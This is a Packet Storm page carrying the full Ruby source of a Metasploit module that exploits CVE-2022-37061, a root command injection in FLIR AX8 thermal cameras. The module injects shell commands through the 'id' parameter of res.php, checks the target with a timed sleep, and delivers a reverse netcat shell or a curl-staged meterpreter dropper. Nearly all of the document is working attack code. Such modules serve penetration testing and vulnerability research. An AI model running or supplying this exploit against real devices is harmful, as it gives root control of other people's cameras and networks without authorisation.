exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

FLIR AX8 1.46.16 Remote Command Injection

FLIR AX8 1.46.16 Remote Command Injection
Posted Nov 2, 2022
Authored by Samy Younsi, Thomas Knudsen, h00die-gr3y | Site metasploit.com

All FLIR AX8 thermal sensor cameras versions up to and including 1.46.16 are vulnerable to remote command injection. This can be exploited to inject and execute arbitrary shell commands as the root user through the id HTTP POST parameter in the res.php endpoint. This module uses the vulnerability to upload and execute payloads gaining root privileges.

tags | exploit, remote, web, arbitrary, shell, root, php
advisories | CVE-2022-37061
SHA-256 | a321cd3e8960e684cbab1cd82bb0f9be0cda474af87c57e7f89fa9aaa83b6bca

FLIR AX8 1.46.16 Remote Command Injection

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/stopwatch'

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'FLIR AX8 unauthenticated RCE',
'Description' => %q{
All FLIR AX8 thermal sensor cameras versions up to and including 1.46.16 are vulnerable to Remote Command Injection.
This can be exploited to inject and execute arbitrary shell commands as the root user through the id HTTP POST parameter
in the res.php endpoint.

This module uses the vulnerability to upload and execute payloads gaining root privileges.
},
'License' => MSF_LICENSE,
'Author' => [
'Thomas Knudsen (https://www.linkedin.com/in/thomasjknudsen)', # Security researcher
'Samy Younsi (https://www.linkedin.com/in/samy-younsi)', # Security researcher
'h00die-gr3y' # metasploit module
],
'References' => [
['CVE', '2022-37061'],
['PACKETSTORM', '168114'],
['URL', 'https://attackerkb.com/topics/UAZaDsQBfx/cve-2022-37061'],
],
'DisclosureDate' => '2022-08-19',
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD, ARCH_ARMLE],
'Privileged' => true,
'Targets' => [
[
'Unix Command',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_netcat'
}
}
],
[
'Linux Dropper',
{
'Platform' => 'linux',
'Arch' => [ARCH_ARMLE],
'Type' => :linux_dropper,
'CmdStagerFlavor' => [ 'curl', 'printf' ],
'DefaultOptions' => {
'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'
}
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'RPORT' => 80,
'SSL' => false
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)
end

def execute_command(cmd, _opts = {})
action_id = rand(1..40)
return send_request_cgi({
'method' => 'POST',
'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',
'uri' => normalize_uri(target_uri.path, 'res.php'),
'vars_post' => {
'action' => 'alarm',
'id' => "#{action_id};#{cmd}"
}
})
rescue StandardError => e
elog("#{peer} - Communication error occurred: #{e.message}", error: e)
print_error("Communication error occurred: #{e.message}")
return nil
end

# Checking if the target is vulnerable by executing a randomized sleep to test the remote code execution
def check
print_status("Checking if #{peer} can be exploited!")
sleep_time = rand(5..10)
print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")
res, elapsed_time = Rex::Stopwatch.elapsed_time do
execute_command("sleep #{sleep_time}")
end

return Exploit::CheckCode::Unknown('No response received from the target!') unless res

print_status("Elapsed time: #{elapsed_time} seconds.")
return CheckCode::Safe('Failed to test command injection.') unless elapsed_time >= sleep_time

CheckCode::Vulnerable('Successfully tested command injection.')
end

def exploit
case target['Type']
when :unix_cmd
print_status("Executing #{target.name} with #{payload.encoded}")
execute_command(payload.encoded)
when :linux_dropper
print_status("Executing #{target.name}")
execute_cmdstager
end
end
end
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close